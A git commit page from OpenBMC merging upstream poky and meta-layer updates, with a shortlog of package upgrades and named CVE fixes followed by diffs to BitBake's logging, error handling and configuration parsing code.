diff options
author | Patrick Williams <patrick@stwcx.xyz> | 2022-02-08 22:42:21 +0300 |
---|---|---|
committer | Patrick Williams <patrick@stwcx.xyz> | 2022-02-15 23:13:23 +0300 |
commit | 23c9e5d72a3c26781493044644406f1e94df062d (patch) | |
tree | 968e2313c93331fd99f8d1380b992fb6c209a898 /poky | |
parent | fff6b3483881af637e01ecfe6853d5264c311442 (diff) | |
download | openbmc-23c9e5d72a3c26781493044644406f1e94df062d.tar.xz |
subtree updates
poky: ed4791c8b0..bba3233897:
Akash Hadke (1):
glibc: Add fix for data races in pthread_create and TLS access
Alexander Kanavin (25):
gnupg: update 2.2.21 -> 2.2.22
gnupg: update 2.2.23 -> 2.2.26
tcf-agent: fetching over git:// no longer works
qemurunner.py: print output from runqemu/qemu-system in stop()
qemurunner.py: handle getOutput() having nothing to read
selftest: disable virgl headless test
wic: keep rootfs_size as integer
testimage: symlink the task log and qemu console log to tmp/log/oeqa
bitbake: bitbake: correct the collections vs collections.abc deprecation
bitbake: bitbake: fix regexp deprecation warnings
bitbake: bitbake: do not import imp in layerindexlib
bitbake: bitbake: adjust parser error check for python 3.10 compatibility
bitbake: bitbake: correct deprecation warning in process.py
e2fsprogs: update to 1.45.6
linux-firmware: upgrade 20210511 -> 20210818
linux-firmware: upgrade 20210818 -> 20210919
wireless-regdb: upgrade 2021.04.21 -> 2021.07.14
wireless-regdb: upgrade 2021.07.14 -> 2021.08.28
ca-certificates: update 20210119 -> 20211016
tzdata: upgrade 2021a -> 2021d
tzdata: update 2021d -> 2021e
linux-firmware: upgrade 20210919 -> 20211027
libpcre/libpcre2: correct SRC_URI
lib/oe/reproducible: correctly set .git location when recursively looking for git repos
parselogs: add a couple systemd false positives
Alexandre Belloni (1):
oeqa/selftest/sstatetests: fix typo ware -> were
Andrej Valek (3):
mklibs-native: drop deprecated cpp17 exceptions
vim: add option to disable NLS support
libpsl: Add config knobs for runtime/builtin conversion choices
Andrey Zhizhikin (1):
lttng-modules: do not search in non-existing folder during install
Anuj Mittal (3):
glibc-version.inc: remove branch= from GLIBC_GIT_URI
gstreamer1.0: fix failing ptest
xserver-xorg: update CVE_PRODUCT
Armin Kuster (24):
glibc: Security fix CVE-2021-33574
glibc: Security fix for CVE-2021-38604
qemu: Security fix CVE-2020-25085
qemu: Security fix CVE-2020-25624
Qemu: Security fix for CVE-2020-25625/2021-3409/2020-17380
qemu: Security fix for CVE-2020-29443
qemu: Security fix CVE-2021-20221
qemu: Security fix CVE-2021-3544
qemu: Security fixes CVE-2021-3545/6
binutils: Security fix for CVE-2021-3549
binutils: Security fix for CVE-2020-16593
lz4: Security Fix for CVE-2021-3520
xserver-xorg: Security fix for CVE-2020-14360/-25712
go: Several Security fixes
libgcrypt: Security fix CVE-2021-33560
apr: Security fix for CVE-2021-35940
libsndfile: Security fix for CVE-2021-3246
qemu: Security fix CVE-2020-12829
qemu: Security fix for CVE-2020-27617
qemu: Security fix for CVE-2020-28916
nettle: Security fix for CVE-2021-3580
nettle: Security fix for CVE-2021-20305
tar: ignore node-tar CVEs
poky.yaml: fedora33: add missing pkgs
Bruce Ashfield (21):
linux-yocto/5.4: update to v5.4.142
parselogs.py: ignore intermittent CD/DVDROM identification failure
linux-yocto/5.4: update to v5.4.143
linux-yocto/5.4: update to v5.4.144
linux-yocto/5.4: update to v5.4.149
linux-yocto/5.4: update to v5.4.150
linux-yocto/5.4: update to v5.4.153
linux-yocto/5.4: update to v5.4.154
linux-yocto/5.4: update to v5.4.155
linux-yocto/5.4: update to v5.4.156
linux-yocto/5.4: update to v5.4.158
linux-yocto/5.4: update to v5.4.159
linux-yocto/5.4: update to v5.4.162
linux-yocto/5.4: update to v5.4.163
linux-yocto/5.4: update to v5.4.165
linux-yocto/5.4: update to v5.4.167
linux-yocto/5.4: update to v5.4.169
linux-yocto/5.4: update to v5.4.170
linux-yocto/5.4: update to v5.4.171
linux-yocto/5.4: update to v5.4.172
kernel: introduce python3-dtschema-wrapper
Chandana kalluri (1):
scriptutils.py: Add check before deleting path
Changqing Li (1):
gdk-pixbuf: fix CVE-2021-20240
Chris Laplante (1):
bitbake: compat.py: remove file since it no longer actually implements anything
Christian Eggers (1):
binutils: Fix a missing break in case statement
Claudius Heine (1):
rng-tools: add systemd-udev-settle wants to service
Claus Stovgaard (1):
cups: Fix missing installation of cups sysv init scripts
Daniel Gomez (1):
os-release: Add DISTRO_CODENAME as vardeps for do_compile
Daniel McGregor (1):
bitbake.conf: Add gpg-agent as a host tool
Denys Dmytriyenko (1):
make-mod-scripts: pass CROSS_COMPILE to configure and build
Dhruva Gole (1):
scripts/checklayer/common.py: Fixed a minor grammatical error
Eero Aaltonen (1):
cmake: FindGTest: Add target for gmock library
Ernst Sjöstrand (1):
dropbear: Fix CVE-2020-36254
Hongxu Jia (1):
nativesdk-pseudo: Fix to work with glibc 2.34 systems
Jate Sujjavanich (3):
libdnf: Backport bugfix for upgrade calc
dnf: Backport bugfix for upgrade
bitbake: hashserv: specify loop for asyncio in python < 3.6
Jon Mason (4):
Update mailing list address
core-image-sato: Fix runqemu error for qemuarmv5
oeqa/manual: Fix no longer valid URLs
scripts/lib/wic/help.py: Update Fedora Kickstart URLs
Jose Quaresma (3):
patch.bbclass: when the patch fails show more info on the fatal error
sstate: fix touching files inside pseudo
sstate: another fix for touching files inside pseudo
Joshua Watt (3):
bitbake: server: Fix early parsing errors preventing zombie bitbake
classes/reproducible_build: Use atomic rename for SDE file
oeqa: reproducible: Fix test not producing diffs
Justin Bronder (1):
bitbake: hashserv: let asyncio discover the running loop
Kai Kang (2):
squashfs-tools: fix CVE-2021-40153
speex: fix CVE-2020-23903
Khem Raj (5):
m4: Do not use SIGSTKSZ
gpgme: Use glibc provided closefrom API when available
webkitgtk: Fix reproducibility in minibrowser
lrzsz: Use Cross AR during compile
libunwind: Backport a fix for -fno-common option to compile
Konrad Weihmann (1):
cve-check: add lockfile to task
Lee Chee Yang (1):
qemu: fix CVE-2021-3527
Marco Felsch (1):
bitbake: bitbake: bitbake-layers: add skip reason to output
Marek Vasut (4):
image_types: Restore pre-btrfs-tools 4.14.1 mkfs.btrfs shrink behavior
piglit: upgrade to latest revision
weston: Backport patches to always activate the top-level surface
Revert "weston: Use systemd notify,"
Mark Hatle (2):
externalsrc: Work with reproducible_build
reproducible_build: Remove BUILD_REPRODUCIBLE_BINARIES checking
Markus Volk (2):
util-linux: disable raw
wic:direct.py: ignore invalid mountpoints during fstab update
Marta Rybczynska (5):
lzo: add CVE_PRODUCT
python3: upgrade 3.8.11 -> 3.8.12
libgcrypt: solve CVE-2021-33560 and CVE-2021-40528
bluez: fix CVE-2021-0129
grub: fix CVE-2020-14372 and CVE-2020-27779
Matt Madison (1):
layer.conf: fix syntax error in PATH setting
Michael Halstead (3):
uninative: Upgrade to 3.3, support glibc 2.34
uninative: Upgrade to 3.4
releases: update to include 3.1.13
Michael Opdenacker (5):
documentation: conf.py: explicit which version of bitbake objects.inv is used
available release updates
remove reference to BB_SETSCENE_VERIFY_FUNCTION2
documentation: further updates for 3.1.13
ref-manual: fix patch documentation
Mike Crowe (1):
curl: Fix CVE-2021-22946 and CVE-2021-22947, whitelist CVE-2021-22945
Mikko Rapeli (1):
openssl: update from 1.1.1k to 1.1.1l
Mingli Yu (3):
python3-magic: add the missing rdepends
bootchart2: remove wait_boot logic
wic: use shutil.which
Minjae Kim (5):
vim: fix CVE-2021-3778
vim: fix 2021-3796
git: fix CVE-2021-40330
vim: fix CVE-2021-4069
inetutils: fix CVE-2021-40491
Neetika Singh (1):
glib-2.0: Add security fixes
Nicolas Dechesne (1):
rt-tests: set branch name in SRC_URI
Oleksandr Kravchuk (1):
mirrors.bbclass: remove dead infozip mirrors
Oleksandr Popovych (1):
utils: Reduce the number of calls to the "dirname" command
Ovidiu Panait (2):
dbus-test: Remove EXTRA_OECONF_X configs
dbus,dbus-test: Move common parts to dbus.inc
Pavel Zhukov (3):
weston: Use systemd notify,
busybox: Fix for CVE-2021-42374
busybox: Fix for CVE-2021-42376
Peter Bergin (1):
systemd: add packageconfig for wheel-group
Purushottam Choudhary (1):
lighttpd: Add patch for reuse large memory chunks
Quentin Schulz (1):
README.OE-Core.md: update URLs
Ralph Siemsen (1):
tar: filter CVEs using vendor name
Ranjitsinh Rathod (6):
rpm: Add fix for CVE-2021-20266
rpm: Handle proper return value to avoid major issues
systemd: Add fix for systemd-networkd crash during free
curl: Whitelist CVE-2021-22897
ncurses: Fix for CVE-2021-39537
libsolv: update tag for missing CVEs
Ricardo Ribalda Delgado (1):
wic: misc: Do not find for executables in ASSUME_PROVIDED
Richard Purdie (91):
gnupg: upgrade 2.2.20 -> 2.2.21
sdk: Decouple default install path from built in path
xdg-utils: Add fix for CVE-2020-27748
oeqa/runtime/parselogs: Make DVD ata error apply to all qemux86 machines
flex: Add CVE-2019-6293 to exclusions for checks
go: Exclude CVE-2021-29923 from report list
build-appliance-image: Update to dunfell head revision
poky: Use SDKPATHINSTALL instead of SDKPATH
build-appliance-image: Update to dunfell head revision
bitbake: tests/fetch2: Use our own git server for dtc test repo
vim: Backport fix for CVE-2021-3770
useradd: Ensure preinst data is expanded correctly in pkgdata
bash: Ensure deterministic build
bitbake: ui/taskexp: Improve startup exception handling
bitbake: ui/taskexp: Fix to work with empty build directories
bitbake: build: Match markup to real function name
bitbake: build: Handle SystemExit in python tasks correctly
bitbake: process: Don't include logs in error message if piping them
bitbake: build: Avoid duplicating logs in verbose mode
bitbake: build: Catch and error upon circular task references
bitbake: data_smart: Improve error display for handled exceptions
bitbake: cookerdata: Improve missing core layer error message
bitbake: cookerdata: Show error for no BBLAYERS in bblayers.conf
bitbake: bitbake-worker: Improve error handling
bitbake: cookerdata: Show a readable error for invalid multiconfig name
bitbake: build/msg: Cleanup verbose option handling
mtd-utils: upgrade 2.1.1 -> 2.1.2
pybootchart: Avoid divide by zero
oeqa/qemurunner: Use oe._exit(), not sys.exit()
libc_package/buildstats: Fix python regex quoting warnings
oeqa/selftest/gotoolchain: Fix temp file cleanup
oeqa/buildproject: Ensure temp directories are cleaned up
glew: Stop polluting /tmp during builds
bitbake: test/fetch: Update urls to match upstream branch name changes
bitbake: fetch2/git: Avoid races over mirror tarball creation
bitbake: fetch2/git: Use os.rename instead of mv
multilib: Avoid sysroot race issues when multilib enabled
pseudo: Fix to work with glibc 2.34 systems
pseudo: Update with fcntl and glibc 2.34 fixes
package: Ensure pclist files are deterministic and don't use full paths
mesa: Ensure megadrivers runtime mappings are deterministic
gnupg: Be deterministic about sendmail
libtool: Fix lto option passing for reproducible builds
libtool: Allow libtool-cross to reproduce
gobject-introspection: Don't write $HOME into scripts
externalsrc: Fix a source date epoch race in reproducible builds
libxml2: Use python3targetconfig to fix reproducibility issue
libnewt: Use python3targetconfig to fix reproducibility issue
python3: Add a fix for a make install race
rpm: Deterministically set vendor macro entry
reproducible_build: Work around caching issues
base: Clean up unneeded len() calls
base: Use repr() for printing exceptions
reproducible_build: Drop obsolete sstate workaround
git: Fix determinism issue
bitbake: fetch/git: Handle github dropping git:// support
bitbake: tests/fetch2: Fix quoting warning
bitbake: tests/fetch: Update github urls
bitbake: tests/fetch: Update pcre.org address after github changes
scripts/convert-srcuri: Backport SRC_URI conversion script from master branch
meta/scripts: Manual git url branch additions
bitbake: fetch/wget: Add timeout for checkstatus calls (30s)
linunistring: Add missing gperf-native dependency
pseudo: Add in ability to flush database with shutdown request
pseudo: Add fcntl64 wrapper
mirrors: Add uninative mirror on kernel.org
sstate: Ensure SDE is accounted for in package task timestamps
sstate: Avoid deploy_source_date_epoch sstate when unneeded
mirrors: Add kernel.org sources mirror for downloads.yoctoproject.org
build-appliance-image: Update to dunfell head revision
bitbake: command: Ensure exceptions inheriting from BBHandledException are visible
bitbake: tinfoil: When sending commands we need to process events
bitbake: process/knotty: Improve early exception handling
scripts/oe-package-browser: Handle no packages being built
reproducible_build/package_XXX: Ensure SDE task is in dependency chain
bitbake: cooker: Ensure reparsing is handled correctly
bitbake: bblayers/action: When adding layers, catch BBHandledException
buildhistory: Fix srcrevs output
oeqa/parselogs: Fix quoting
gcc: Add CVE-2021-37322 to the list of CVEs to ignore
build-appliance-image: Update to dunfell head revision
bitbake: cooker/command: Add a dummy event for tinfoil testing
openssl: Add reproducibility fix
oeqa/selftest/bbtests: Use YP sources mirror instead of GNU
oeqa/selftest/tinfoil: Update to use test command
scripts: Update to use exec_module() instead of load_module()
bitbake: utils: Update to use exec_module() instead of load_module()
bitbake: tests/fetch: Drop gnu urls from wget connectivity test
expat: Update HOMEPAGE to current url
lttng-tools: Add missing DEPENDS on bison-native
build-appliance-image: Update to dunfell head revision
Robert P. J. Day (1):
common-licenses: add "Unlicense" license file
Ross Burton (20):
cpio: backport fix for CVE-2021-38185
libsoup-2.4: remove obsolete intltool dependency
uninative: Improve glob to handle glibc 2.34
devtool: fix modify with patches in override directories
sstate: don't silently handle all exceptions in sstate_checkhashes
oe/license: implement ast.NodeVisitor.visit_Constant
license.bbclass: implement ast.NodeVisitor.visit_Constant
oe/utils: log exceptions in ThreadedWorker functions
testimage: fix unclosed testdata file
oeqa/runtime: load modules using importlib
oeqa/runtime: search sys.path explicitly for modules
vim: fix CVE-2021-3796, CVE-2021-3872, and CVE-2021-3875
vim: add patch number to CVE-2021-3778 patch
vim: fix CVE-2021-3927 and CVE-2021-3928
gmp: fix CVE-2021-43618
openssh: remove redundant BSD license
vim: fix CVE-2021-3968 and CVE-2021-3973
runqemu: check the qemu PID has been set before kill()ing it
cve-update-db-native: use fetch task
xserver-xorg: whitelist two CVEs
Sakib Sajal (7):
qemu: fix CVE-2021-20181
qemu: fix CVE-2021-3416
qemu: fix CVE-2021-20257
qemu: fix CVE-2021-3582
qemu: fix CVE-2021-3607
qemu: fix CVE-2021-3608
qemu: fix CVE-2021-3682
Saloni (1):
ffmpeg: Add fix for CVEs
Sana Kazi (1):
busybox: Fix multiple security issues in awk
Saul Wold (1):
gnupg: uprev 2.2.22 -> 2.2.23
Stefan Herbrechtsmeier (2):
recipetool: Set master branch only as fallback
selftest/devtool: Check branch in git fetch
Stefano Babic (1):
mtd-utils: upgrade 2.1.2 -> 2.1.3
Steve Sakoman (36):
documentation: prepare for 3.1.11 release
poky.conf: Bump version for 3.1.11 release
connman: add CVE_PRODUCT
gcc: fix missing dependencies for selftests
util-linux: Fix reproducibility
target/ssh.py: add HostKeyAlgorithms option to test commands
poky.conf: Add fedora 34 as a supported distro
poky.conf: Add debian 11 as a supported distro
selftest/reproducible: adjust exclusion list for dunfell
waffle: old website is down, update to new project URLs
stress-ng: convert to git, website is down
stress-ng: improve reproducibility
meta: Add explict branch to git SRC_URIs, handle github url changes
poky.conf: Bump version for 3.1.12 release
ref-system-requirements.rst: Add Debian 11 to list of supported distros
ref-system-requirements.rst: Add Fedora 34 to list of supported distros
documentation: prepare for 3.1.12 release
python3-magic: add missing DEPENDS
selftest/reproducible: add webkitgtk back to exclusion list for dunfell
Revert "vim: fix 2021-3796"
bind: update to 9.11.33
bind: update to 9.11.34
bind: update to 9.11.35
poky.conf: Bump version for 3.1.13 release
cve-extra-exclusions: add db CVEs to exclusion list
selftest: skip virgl test on centos 8 entirely
selftest: skip virgl test on fedora 34 entirely
libpcre2: update SRC_URI
selftest: skip virgl test on fedora 35
asciidoc: properly detect and compare Python versions >= 3.10
valgrind: skip flakey ptest (gdbserver_tests/hginfo)
oeqa/selftest/cases/tinfoil.py: increase timeout 60->120s test_wait_event
expat fix CVE-2022-22822 through CVE-2022-22827
expat: fix CVE-2021-45960
expat: fix CVE-2021-46143
poky.conf: Bump version for 3.1.14 release
Teoh Jay Shen (2):
oeqa/runtime/parselogs: modified drm error in common errors list
linux-yocto/5.4: update genericx86* machines to v5.4.158
Tim Orling (1):
scripts/buildhistory-diff: drop use of distutils
Tom Pollard (2):
bzip2: Update soname for libbz2 1.0.8
libsamplerate0: Set correct soname for 0.1.9
Visa Hankala (1):
iputils: Fix regression of arp table update
Wang Mingyu (6):
gnupg: upgrade 2.2.26 -> 2.2.27
dbus: upgrade 1.12.16 -> 1.12.18
dbus-test: upgrade 1.12.16 -> 1.12.18
dbus: upgrade 1.12.18 -> 1.12.20
e2fsprogs: upgrade 1.45.6 -> 1.45.7
openssh: Improve LICENSE to show BSD license variants.
William A. Kennington III (1):
rm_work.bbclass: Fix for files starting with -
Yi Zhao (1):
oeqa: fix warnings for append operators combined with +=
jbouchard (1):
Use the label provided when formating a dos partition
sana kazi (3):
openssh: Fix CVE-2021-28041
openssh: Fix CVE-2021-41617
openssh: Whitelist CVE-2016-20012
wangmy (1):
linux-firmware: upgrade 20211027 -> 20211216
meta-raspberrypi: 59c2d6f7a8..934064a019:
Changqing Li (1):
99-com.rules: fix error invalid substitution type
Marcel Hamer (1):
recipes: Update SRC_URI protocols for github
Pavel Zhukov (1):
linux-firmware-rpidistro: Use buster branch instead of master
meta-security: 6466c6fb02..b76698c788:
Armin Kuster (1):
linux-%_5.%.bbappend: drop recipe
meta-openembedded: 4a0d93d250..ab9fca485e:
Alexander Thoma (1):
keyutils: fix install path
Anastasios Kavoukis (1):
pm-qa: fix paths for shell scripts
Andreas Weger (3):
spirv-tools: Define SRCREV_FORMAT
grpc: Define SRCREV_FORMAT
drdb-utils: Define SRCREV_FORMAT
Armin Kuster (7):
xterm: Security fix for CVE-2021-27135
tcpdump: Exclude CVE-2020-8036 from check
nss: Two Security fixes CVE-2020-6829 and 12400
dnsmasq: Security fix CVE-2021-3448
Apache: Several CVE fixes
redis: update to 5.0.14
recipes: Update SRC_URI branch and protocols
Armin kuster (1):
dovecot: refresh patches
Changqing Li (1):
apache2: upgrade 2.4.46 -> 2.4.48
Ernst Sjöstrand (1):
libmicrohttpd: Add patch to fix CVE-2021-3466
Gianfranco (3):
dlt-daemon: update to 2.18.5
dlt-daemon: fix build failure when dlt-dbus is enabled, due to missing service file.
dlt-daemon: update from 2.18.6 to 2.18.7
Gianfranco Costamagna (3):
dlt-daemon: fix build with upstream-proposed patch for MUSL libc
dlt-daemon: superseed upstream pr #238 patch with pr #245 due to unexpected behaviour
dlt-daemon: update to new release 2.18.6
Jeremy Puhlman (1):
c-ares: switch from master to main
Khem Raj (2):
gst-shark: Define SRCREV_FORMAT
android-tools: Define SRCREV_FORMAT
Konrad Weihmann (1):
gattlib: remove includedir from base package
Marek Vasut (1):
dstat: Add missing python-six runtime dependency
Marta Rybczynska (1):
jansson: whitelist CVE-2020-36325
Martin Jansa (1):
sdbus-c++: don't fetch googletest during do_configure
Maíra Canal via (1):
python3-fasteners: update 0.15 -> 0.16.3
Neetika Singh (1):
c-ares: Add fix for CVE-2021-3672
Pierre-Jean Texier (1):
stunnel: upgrade 5.56 -> 5.57
Purushottam Choudhary (1):
tcpdump: Update CVE-2020-8037 tag
Ranjitsinh Rathod (1):
nss: Fix CVE-2020-12403
Richard Purdie (1):
gattlib: Place pkgconfig file in correct package
Robert Joslyn (1):
postgresql: Update to 12.9
Spectrejan (1):
brotli: add patch to fix CVE-2020-8927
Yi Zhao (3):
krb5: fix CVE-2021-36222
postfix: fix build with glibc 2.34
postfix: upgrade 3.4.12 -> 3.4.23
Zang Ruochen (1):
c-ares: upgrade 1.16.0 -> 1.16.1
lumag (1):
lmsensors: do not depend on lmsensors-isatools on non-x86
sana kazi (4):
dovecot: Fix CVE-2020-12100
dovecot: Fix CVE-2020-12673
dovecot: Fix CVE-2020-12674
nss: Fix CVE-2021-43527
wangmy (1):
apache2: upgrade 2.4.48 -> 2.4.49
Signed-off-by: Patrick Williams <patrick@stwcx.xyz>
Change-Id: Ic7c24b8b9d1566d6273e388c20d242dbfeaf08de
Diffstat (limited to 'poky')
503 files changed, 18903 insertions, 1152 deletions
diff --git a/poky/README.OE-Core b/poky/README.OE-Core index 521916cd4f..2f2127fb03 100644 --- a/poky/README.OE-Core +++ b/poky/README.OE-Core @@ -6,24 +6,24 @@ of OpenEmbedded. It is distro-less (can build a functional image with DISTRO = "nodistro") and contains only emulated machine support. For information about OpenEmbedded, see the OpenEmbedded website: - http://www.openembedded.org/ + https://www.openembedded.org/ The Yocto Project has extensive documentation about OE including a reference manual which can be found at: - http://yoctoproject.org/documentation + https://docs.yoctoproject.org/ Contributing ------------ Please refer to -http://www.openembedded.org/wiki/How_to_submit_a_patch_to_OpenEmbedded +https://www.openembedded.org/wiki/How_to_submit_a_patch_to_OpenEmbedded for guidelines on how to submit patches. Mailing list: - http://lists.openembedded.org/mailman/listinfo/openembedded-core + https://lists.openembedded.org/g/openembedded-core Source code: - http://git.openembedded.org/openembedded-core/ + https://git.openembedded.org/openembedded-core/ diff --git a/poky/bitbake/bin/bitbake-worker b/poky/bitbake/bin/bitbake-worker index 97cc0fd60f..e3ce01eec8 100755 --- a/poky/bitbake/bin/bitbake-worker +++ b/poky/bitbake/bin/bitbake-worker @@ -413,9 +413,9 @@ class BitbakeWorker(object): def handle_workerdata(self, data): self.workerdata = pickle.loads(data) + bb.build.verboseShellLogging = self.workerdata["build_verbose_shell"] + bb.build.verboseStdoutLogging = self.workerdata["build_verbose_stdout"] bb.msg.loggerDefaultLogLevel = self.workerdata["logdefaultlevel"] - bb.msg.loggerDefaultVerbose = self.workerdata["logdefaultverbose"] - bb.msg.loggerVerboseLogs = self.workerdata["logdefaultverboselogs"] bb.msg.loggerDefaultDomains = self.workerdata["logdefaultdomain"] for mc in self.databuilder.mcdata: self.databuilder.mcdata[mc].setVar("PRSERV_HOST", self.workerdata["prhost"]) @@ -505,9 +505,11 @@ except BaseException as e: import traceback sys.stderr.write(traceback.format_exc()) sys.stderr.write(str(e)) +finally: + worker_thread_exit = True + worker_thread.join() -worker_thread_exit = True -worker_thread.join() - -workerlog_write("exitting") +workerlog_write("exiting") +if not normalexit: + sys.exit(1) sys.exit(0) diff --git a/poky/bitbake/lib/bb/build.py b/poky/bitbake/lib/bb/build.py index 23b6ee455f..aaada8a18b 100644 --- a/poky/bitbake/lib/bb/build.py +++ b/poky/bitbake/lib/bb/build.py @@ -27,6 +27,9 @@ from bb import data, event, utils bblogger = logging.getLogger('BitBake') logger = logging.getLogger('BitBake.Build') +verboseShellLogging = False +verboseStdoutLogging = False + __mtime_cache = {} def cached_mtime_noerror(f): @@ -290,8 +293,8 @@ def exec_func_python(func, d, runfile, cwd=None): lineno = int(d.getVarFlag(func, "lineno", False)) bb.methodpool.insert_method(func, text, fn, lineno - 1) - comp = utils.better_compile(code, func, "exec_python_func() autogenerated") - utils.better_exec(comp, {"d": d}, code, "exec_python_func() autogenerated") + comp = utils.better_compile(code, func, "exec_func_python() autogenerated") + utils.better_exec(comp, {"d": d}, code, "exec_func_python() autogenerated") finally: bb.debug(2, "Python function %s finished" % func) @@ -371,7 +374,7 @@ def exec_func_shell(func, d, runfile, cwd=None): bb.data.emit_func(func, script, d) - if bb.msg.loggerVerboseLogs: + if verboseShellLogging or bb.utils.to_boolean(d.getVar("BB_VERBOSE_LOGS", False)): script.write("set -x\n") if cwd: script.write("cd '%s'\n" % cwd) @@ -391,7 +394,7 @@ exit $ret if fakerootcmd: cmd = [fakerootcmd, runfile] - if bb.msg.loggerDefaultVerbose: + if verboseStdoutLogging: logfile = LogTee(logger, StdoutNoopContextManager()) else: logfile = StdoutNoopContextManager() @@ -587,11 +590,15 @@ def _exec_task(fn, task, d, quieterr): except bb.BBHandledException: event.fire(TaskFailed(task, fn, logfn, localdata, True), localdata) return 1 - except Exception as exc: + except (Exception, SystemExit) as exc: if quieterr: event.fire(TaskFailedSilent(task, fn, logfn, localdata), localdata) else: errprinted = errchk.triggered + # If the output is already on stdout, we've printed the information in the + # logs once already so don't duplicate + if verboseStdoutLogging: + errprinted = True logger.error(str(exc)) event.fire(TaskFailed(task, fn, logfn, localdata, errprinted), localdata) return 1 @@ -901,6 +908,8 @@ def tasksbetween(task_start, task_end, d): def follow_chain(task, endtask, chain=None): if not chain: chain = [] + if task in chain: + bb.fatal("Circular task dependencies as %s depends on itself via the chain %s" % (task, " -> ".join(chain))) chain.append(task) for othertask in tasks: if othertask == task: diff --git a/poky/bitbake/lib/bb/command.py b/poky/bitbake/lib/bb/command.py index 6abf38668b..98c945edb5 100644 --- a/poky/bitbake/lib/bb/command.py +++ b/poky/bitbake/lib/bb/command.py @@ -74,8 +74,12 @@ class Command: result = command_method(self, commandline) except CommandError as exc: return None, exc.args[0] - except (Exception, SystemExit): + except (Exception, SystemExit) as exc: import traceback + if isinstance(exc, bb.BBHandledException): + # We need to start returning real exceptions here. Until we do, we can't + # tell if an exception is an instance of bb.BBHandledException + return None, "bb.BBHandledException()\n" + traceback.format_exc() return None, traceback.format_exc() else: return result, None @@ -620,6 +624,16 @@ class CommandsAsync: command.finishAsyncCommand() findFilesMatchingInDir.needcache = False + def testCookerCommandEvent(self, command, params): + """ + Dummy command used by OEQA selftest to test tinfoil without IO + """ + pattern = params[0] + + command.cooker.testCookerCommandEvent(pattern) + command.finishAsyncCommand() + testCookerCommandEvent.needcache = False + def findConfigFilePath(self, command, params): """ Find the path of the requested configuration file diff --git a/poky/bitbake/lib/bb/compat.py b/poky/bitbake/lib/bb/compat.py deleted file mode 100644 index 49356681ab..0000000000 --- a/poky/bitbake/lib/bb/compat.py +++ /dev/null @@ -1,10 +0,0 @@ -# -# SPDX-License-Identifier: GPL-2.0-only -# - -"""Code pulled from future python versions, here for compatibility""" - -from collections import MutableMapping, KeysView, ValuesView, ItemsView, OrderedDict -from functools import total_ordering - - diff --git a/poky/bitbake/lib/bb/cooker.py b/poky/bitbake/lib/bb/cooker.py index 730cdc56ff..ac54d4378d 100644 --- a/poky/bitbake/lib/bb/cooker.py +++ b/poky/bitbake/lib/bb/cooker.py @@ -411,10 +411,7 @@ class BBCooker: self.data.disableTracking() def parseConfiguration(self): - # Set log file verbosity - verboselogs = bb.utils.to_boolean(self.data.getVar("BB_VERBOSE_LOGS", False)) - if verboselogs: - bb.msg.loggerVerboseLogs = True + self.updateCacheSync() # Change nice level if we're asked to nice = self.data.getVar("BB_NICE_LEVEL") @@ -1022,6 +1019,11 @@ class BBCooker: if matches: bb.event.fire(bb.event.FilesMatchingFound(filepattern, matches), self.data) + def testCookerCommandEvent(self, filepattern): + # Dummy command used by OEQA selftest to test tinfoil without IO + matches = ["A", "B"] + bb.event.fire(bb.event.FilesMatchingFound(filepattern, matches), self.data) + def findProviders(self, mc=''): return bb.providers.findProviders(self.databuilder.mcdata[mc], self.recipecaches[mc], self.recipecaches[mc].pkg_pn) diff --git a/poky/bitbake/lib/bb/cookerdata.py b/poky/bitbake/lib/bb/cookerdata.py index 472423fdc8..30727bf2ee 100644 --- a/poky/bitbake/lib/bb/cookerdata.py +++ b/poky/bitbake/lib/bb/cookerdata.py @@ -58,11 +58,14 @@ class ConfigParameters(object): def updateToServer(self, server, environment): options = {} for o in ["abort", "force", "invalidate_stamp", - "verbose", "debug", "dry_run", "dump_signatures", + "debug", "dry_run", "dump_signatures", "debug_domains", "extra_assume_provided", "profile", "prefile", "postfile", "server_timeout"]: options[o] = getattr(self.options, o) + options['build_verbose_shell'] = self.options.verbose + options['build_verbose_stdout'] = self.options.verbose + ret, error = server.runCommand(["updateConfig", options, environment, sys.argv]) if error: raise Exception("Unable to update the server configuration with local parameters: %s" % error) @@ -125,6 +128,8 @@ class CookerConfiguration(object): self.skipsetscene = False self.invalidate_stamp = False self.dump_signatures = [] + self.build_verbose_shell = False + self.build_verbose_stdout = False self.dry_run = False self.tracking = False self.xmlrpcinterface = [] @@ -297,6 +302,8 @@ class CookerDataBuilder(object): multiconfig = (self.data.getVar("BBMULTICONFIG") or "").split() for config in multiconfig: + if config[0].isdigit(): + bb.fatal("Multiconfig name '%s' is invalid as multiconfigs cannot start with a digit" % config) mcdata = self.parseConfigurationFiles(self.prefiles, self.postfiles, config) bb.event.fire(bb.event.ConfigParsed(), mcdata) self.mcdata[config] = mcdata @@ -348,6 +355,9 @@ class CookerDataBuilder(object): layers = (data.getVar('BBLAYERS') or "").split() broken_layers = [] + if not layers: + bb.fatal("The bblayers.conf file doesn't contain any BBLAYERS definition") + data = bb.data.createCopy(data) approved = bb.utils.approved_variables() @@ -399,6 +409,8 @@ class CookerDataBuilder(object): if c in collections_tmp: bb.fatal("Found duplicated BBFILE_COLLECTIONS '%s', check bblayers.conf or layer.conf to fix it." % c) compat = set((data.getVar("LAYERSERIES_COMPAT_%s" % c) or "").split()) + if compat and not layerseries: + bb.fatal("No core layer found to work with layer '%s'. Missing entry in bblayers.conf?" % c) if compat and not (compat & layerseries): bb.fatal("Layer %s is not compatible with the core layer which only supports these series: %s (layer is compatible with %s)" % (c, " ".join(layerseries), " ".join(compat))) diff --git a/poky/bitbake/lib/bb/data_smart.py b/poky/bitbake/lib/bb/data_smart.py index 61b37cf334..c46d3f0a08 100644 --- a/poky/bitbake/lib/bb/data_smart.py +++ b/poky/bitbake/lib/bb/data_smart.py @@ -17,7 +17,7 @@ BitBake build tools. # Based on functions from the base bb module, Copyright 2003 Holger Schurig import copy, re, sys, traceback -from collections import MutableMapping +from collections.abc import MutableMapping import logging import hashlib import bb, bb.codeparser @@ -403,7 +403,7 @@ class DataSmart(MutableMapping): s = __expand_python_regexp__.sub(varparse.python_sub, s) except SyntaxError as e: # Likely unmatched brackets, just don't expand the expression - if e.msg != "EOL while scanning string literal": + if e.msg != "EOL while scanning string literal" and not e.msg.startswith("unterminated string literal"): raise if s == olds: break @@ -411,6 +411,8 @@ class DataSmart(MutableMapping): raise except bb.parse.SkipRecipe: raise + except bb.BBHandledException: + raise except Exception as exc: tb = sys.exc_info()[2] raise ExpansionError(varname, s, exc).with_traceback(tb) from exc diff --git a/poky/bitbake/lib/bb/event.py b/poky/bitbake/lib/bb/event.py 